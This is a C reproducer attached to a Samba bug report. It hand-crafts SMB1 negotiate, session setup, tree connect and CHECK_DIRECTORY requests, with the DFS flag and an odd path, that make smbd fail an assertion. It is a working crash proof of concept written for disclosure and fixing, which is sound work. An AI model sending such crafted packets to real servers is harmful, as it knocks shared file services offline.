The Samba-Bugzilla – Attachment 17980 Details for
Bug 15419
weird filename can cause assert to fail in openat_pathref_fsp_nosymlink()
program to reproduce
smbd20b.c (text/x-csrc), 7.87 KB, created by
Robert Morris
on 2023-07-13 20:23:03 UTC
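#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>

/*
 * Minimal hand-rolled SMB1 client that reproduces the report: it sends
 * NEGOTIATE, SESSION_SETUP_ANDX and TREE_CONNECT_ANDX, then one
 * CHECK_DIRECTORY with the DFS flag set and the path from the report.
 * Field layouts follow the MS-CIFS sections quoted next to each block.
 *
 * All multi-byte fields are written through small byte-wise helpers:
 * the original cast `buf + off` to `short *` / `int *`, which is an
 * unaligned, aliasing-violating store and also silently assumed a
 * little-endian host.
 */

static const char *server_ip = "127.0.0.1";
static const char *username = "z";
static const char *password = "xxxxxxxx";

static int s = -1;   /* connected socket, shared by every request */
static int uid = 0;  /* UID taken from the session setup response */
static int tid = 0;  /* TID taken from the tree connect response */

static unsigned int header_flags = 0;
static unsigned int header_flags2 = 0;

enum {
    REQ_SIZE = 128,   /* every request buffer is this big and is sent whole */
    RESP_SIZE = 1024  /* response buffer */
};

/* Store v as a little-endian 16-bit field (SMB byte order). */
static void
put_le16(char *p, unsigned int v)
{
    unsigned char *u = (unsigned char *)p;
    u[0] = (unsigned char)(v & 0xff);
    u[1] = (unsigned char)((v >> 8) & 0xff);
}

/* Store v as a little-endian 32-bit field (SMB byte order). */
static void
put_le32(char *p, unsigned int v)
{
    unsigned char *u = (unsigned char *)p;
    u[0] = (unsigned char)(v & 0xff);
    u[1] = (unsigned char)((v >> 8) & 0xff);
    u[2] = (unsigned char)((v >> 16) & 0xff);
    u[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Store v big-endian: the NetBIOS session header length is network order. */
static void
put_be16(char *p, unsigned int v)
{
    unsigned char *u = (unsigned char *)p;
    u[0] = (unsigned char)((v >> 8) & 0xff);
    u[1] = (unsigned char)(v & 0xff);
}

/* Read a little-endian 16-bit field from a response. */
static unsigned int
get_le16(const unsigned char *p)
{
    return (unsigned int)p[0] | ((unsigned int)p[1] << 8);
}

/* Read a little-endian 32-bit field from a response. */
static unsigned int
get_le32(const unsigned char *p)
{
    return (unsigned int)p[0] | ((unsigned int)p[1] << 8) |
           ((unsigned int)p[2] << 16) | ((unsigned int)p[3] << 24);
}

/*
 * Copy len bytes of src into buf at offset ii and return the new offset.
 * Exits instead of overrunning buf: the original memcpy'd strlen()+1
 * bytes unchecked, so a long dialect, user or path name would have
 * written past the 128-byte stack buffer.
 */
static int
append_bytes(char *buf, size_t cap, int ii, const void *src, size_t len)
{
    if (ii < 0 || (size_t)ii > cap || len > cap - (size_t)ii) {
        fprintf(stderr, "request too long (%zu bytes at offset %d)\n", len, ii);
        exit(1);
    }
    memcpy(buf + ii, src, len);
    return ii + (int)len;
}

/* Append a NUL-terminated string (terminator included). */
static int
append_cstr(char *buf, size_t cap, int ii, const char *str)
{
    return append_bytes(buf, cap, ii, str, strlen(str) + 1);
}

/* Write the whole buffer, retrying on short writes; exits on error or EOF. */
static void
write_all(const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = write(s, buf, len);
        if (n <= 0) {
            perror("write");
            exit(1);
        }
        buf += n;
        len -= (size_t)n;
    }
}

/*
 * Finish a request that was built in a REQ_SIZE buffer and send it.
 *
 * ii is the offset just past the last field.  As in the original
 * ("ii = sizeof(buf); // this works"), the entire buffer is sent, so the
 * bytes after ii are whatever fill value the caller memset the buffer
 * with; the NetBIOS length is set accordingly.
 */
static void
send_request(char *buf, int ii)
{
    assert(ii >= 0 && ii <= REQ_SIZE);
    ii = REQ_SIZE;

    /* NetBIOS session length: bytes that follow the 4-byte session header */
    put_be16(buf + 2, (unsigned int)(ii - 4));

    printf("writing %d bytes\n", ii);
    fflush(stdout);

    write_all(buf, (size_t)ii);
}

/*
 * Read one response into buf (zeroed first) and return the byte count.
 *
 * A single read() is assumed to deliver the whole reply, which holds for
 * these small replies on a local connection.  Because the buffer is
 * pre-zeroed, a short read or a closed connection (count 0) yields zero
 * fields rather than stale data.  Exits on a read error instead of
 * reporting "-1 bytes" like the original did.
 */
static int
read_response(unsigned char *buf, size_t cap)
{
    memset(buf, 0, cap);
    ssize_t cc = read(s, buf, cap);
    if (cc < 0) {
        perror("read");
        exit(1);
    }
    return (int)cc;
}

/*
 * Write the 4-byte NetBIOS session header and the 32-byte SMB header
 * (MS-CIFS 2.2.3.1) for `command` at the start of buf.
 *
 * Returns the offset of the first byte after the header (36).  The
 * NetBIOS length is left as 0 and filled in by send_request().  The
 * 8-byte SecurityFeatures field is skipped, not written, so it carries
 * whatever the caller filled the buffer with.  TID, UID and the two
 * flags fields come from the file-scope globals.
 */
int
header(char *buf, int command)
{
    int ii = 0;

    /* NetBIOS session service header: type 0, then a 24-bit length */
    buf[ii++] = 0;
    buf[ii++] = 0;
    put_be16(buf + ii, 0);          /* length placeholder, see send_request() */
    ii += 2;

    /* SMB header, MS-CIFS 2.2.3.1 */
    buf[ii++] = (char)0xff;
    buf[ii++] = 'S';
    buf[ii++] = 'M';
    buf[ii++] = 'B';
    buf[ii++] = (char)command;
    put_le32(buf + ii, 0);          /* Status */
    ii += 4;
    buf[ii++] = (char)header_flags; /* Flags */
    put_le16(buf + ii, header_flags2);
    ii += 2;
    put_le16(buf + ii, 0);          /* PIDHigh */
    ii += 2;
    ii += 8;                        /* SecurityFeatures: deliberately untouched */
    put_le16(buf + ii, 0);          /* Reserved */
    ii += 2;
    put_le16(buf + ii, (unsigned int)tid);
    ii += 2;
    put_le16(buf + ii, 0);          /* PIDLow */
    ii += 2;
    put_le16(buf + ii, (unsigned int)uid);
    ii += 2;
    put_le16(buf + ii, 0);          /* MID */
    ii += 2;

    return ii;
}

/*
 * SMB_COM_NEGOTIATE offering a single dialect (MS-CIFS 2.2.4.52), then
 * print the interesting fields of the reply (2.2.4.52.2).
 * dialect is normally "NT LM 0.12".
 */
void
negotiate(const char *dialect)
{
    {
        char buf[REQ_SIZE];
        memset(buf, 1, sizeof buf);  /* 0x01 fill: ends up in SecurityFeatures and the tail */

        int ii = header(buf, 0x72);

        /* parameter block, MS-CIFS 2.2.3.2: no parameter words */
        buf[ii++] = 0;               /* WordCount */
        printf("parameters start at %d\n", ii);

        /* data block, MS-CIFS 2.2.3.3: ByteCount, then the dialect list */
        int bci = ii;                /* ByteCount is filled in once the data is known */
        ii += 2;
        buf[ii++] = 0x02;            /* BufferFormat: Dialect */
        ii = append_cstr(buf, sizeof buf, ii, dialect);
        put_le16(buf + bci, (unsigned int)(ii - bci - 2));

        send_request(buf, ii);
    }

    {
        unsigned char buf[RESP_SIZE];
        int cc = read_response(buf, sizeof buf);
        printf("read %d for negotiate response\n", cc);
        printf("WordCount %d (expecting 17)\n", buf[36]);
        printf("DialectIndex %d (expecting 0)\n", (int)get_le16(buf + 37));
        printf("SecurityMode 0x%x (expecting 0x1)\n", buf[39]);
    }
}

/*
 * SMB_COM_SESSION_SETUP_ANDX in its OEM (non-Unicode) form, MS-CIFS
 * 2.2.4.53.1, with the password sent as plain text, then record the UID
 * from the reply (2.2.4.53.2) for the following requests.
 */
void
setup(void)
{
    {
        char buf[REQ_SIZE];
        memset(buf, 1, sizeof buf);

        int ii = header(buf, 0x73);
        size_t pwlen = strlen(password);

        /* parameter block: 13 words */
        buf[ii++] = 13;              /* WordCount */
        buf[ii++] = (char)0xff;      /* AndXCommand: no chained command */
        buf[ii++] = 0;               /* AndXReserved */
        put_le16(buf + ii, 0);       /* AndXOffset */
        ii += 2;
        put_le16(buf + ii, 8192);    /* MaxBufferSize */
        ii += 2;
        put_le16(buf + ii, 2);       /* MaxMpxCount */
        ii += 2;
        put_le16(buf + ii, 0);       /* VcNumber */
        ii += 2;
        put_le32(buf + ii, 0);       /* SessionKey: should echo the negotiate reply; not done here */
        ii += 4;
        put_le16(buf + ii, (unsigned int)pwlen);  /* OEMPasswordLen */
        ii += 2;
        put_le16(buf + ii, 0);       /* UnicodePasswordLen */
        ii += 2;
        put_le32(buf + ii, 0);       /* Reserved */
        ii += 4;
        put_le32(buf + ii, 0);       /* Capabilities */
        ii += 4;

        /* data block */
        int bci = ii;
        ii += 2;
        /* OEMPassword: no terminator, its length is OEMPasswordLen above */
        ii = append_bytes(buf, sizeof buf, ii, password, pwlen);
        /*
         * No pad byte before AccountName: the OEM form is unpadded.  (The
         * original had `if(ii % 1) ii++;`, which can never fire, so the
         * bytes on the wire are the same.)
         */
        ii = append_cstr(buf, sizeof buf, ii, username);   /* AccountName */
        static const char empty3[3] = { 0, 0, 0 };
        ii = append_bytes(buf, sizeof buf, ii, empty3, sizeof empty3);  /* PrimaryDomain, NativeOS, NativeLanMan: all empty */
        put_le16(buf + bci, (unsigned int)(ii - bci - 2));

        send_request(buf, ii);
    }

    {
        unsigned char buf[RESP_SIZE];
        int cc = read_response(buf, sizeof buf);
        printf("read %d for session setup response\n", cc);
        printf("WordCount %d\n", buf[36]);
        printf("Action %d (expecting 0)\n", (int)get_le16(buf + 41));
        uid = (int)get_le16(buf + 32);   /* UID field of the SMB header */
        printf("UID 0x%x\n", uid);
    }
}

/*
 * SMB_COM_TREE_CONNECT_ANDX to share "x" as a disk service ("A:"),
 * MS-CIFS 2.2.4.55, then record the TID from the reply (2.2.4.55.2).
 */
void
tree_connect(void)
{
    {
        char buf[REQ_SIZE];
        memset(buf, 1, sizeof buf);

        int ii = header(buf, 0x75);

        /* parameter block: 4 words */
        buf[ii++] = 4;               /* WordCount */
        buf[ii++] = (char)0xff;      /* AndXCommand: none */
        buf[ii++] = 0;               /* AndXReserved */
        put_le16(buf + ii, 0);       /* AndXOffset */
        ii += 2;
        put_le16(buf + ii, 0);       /* Flags */
        ii += 2;
        put_le16(buf + ii, 1);       /* PasswordLength: the single NUL below */
        ii += 2;

        /* data block */
        int bci = ii;
        ii += 2;
        buf[ii++] = '\0';            /* Password */
        buf[ii++] = 'x';             /* Path */
        buf[ii++] = '\0';
        buf[ii++] = 'A';             /* Service */
        buf[ii++] = ':';
        buf[ii++] = '\0';
        put_le16(buf + bci, (unsigned int)(ii - bci - 2));

        send_request(buf, ii);
    }

    {
        unsigned char buf[RESP_SIZE];
        int cc = read_response(buf, sizeof buf);
        printf("read %d for tree connect response\n", cc);
        tid = (int)get_le16(buf + 28);   /* TID field of the SMB header */
        printf("TID 0x%x\n", tid);
    }
}

/*
 * SMB_COM_CHECK_DIRECTORY for `name`, MS-CIFS 2.2.4.17, then print the
 * 32-bit Status from the reply header.  Honors whatever header_flags2
 * the caller has set (main() sets the DFS flag first).
 */
void
check_directory(const char *name)
{
    {
        char buf[REQ_SIZE];
        memset(buf, 0xff, sizeof buf);  /* note: 0xff fill here, unlike the other requests */

        int ii = header(buf, 0x10);

        /* parameter block: no words */
        buf[ii++] = 0;               /* WordCount */

        /* data block */
        int bci = ii;
        ii += 2;
        buf[ii++] = 0x04;            /* BufferFormat: SMB_STRING */
        ii = append_cstr(buf, sizeof buf, ii, name);   /* DirectoryName */
        put_le16(buf + bci, (unsigned int)(ii - bci - 2));

        send_request(buf, ii);
    }

    {
        unsigned char buf[RESP_SIZE];
        int cc = read_response(buf, sizeof buf);
        printf("read %d for check_directory response\n", cc);
        printf("check_directory Status 0x%x\n", get_le32(buf + 9));   /* Status field of the header */
    }
}

int
main(void)
{
    signal(SIGPIPE, SIG_IGN);   /* a server that drops the connection must not kill us before we print */
    signal(SIGTERM, SIG_IGN);   /* kept from the original; its purpose is not stated */

    struct sockaddr_in sin;
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(445);  /* SMB over TCP */
    sin.sin_addr.s_addr = inet_addr(server_ip);

    /* Retry until the server accepts the connection. */
    for (;;) {
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s < 0) {
            perror("socket");
            exit(1);
        }
        if (connect(s, (struct sockaddr *)&sin, sizeof sin) == 0) {
            break;
        }
        close(s);
        s = -1;
        sleep(1);
    }

    sleep(1);

    negotiate("NT LM 0.12");
    setup();
    tree_connect();
    header_flags2 |= 0x1000;    /* SMB_FLAGS2_DFS for the next request */
    check_directory("\\x//\\/");

    sleep(1);
    close(s);
    return 0;
}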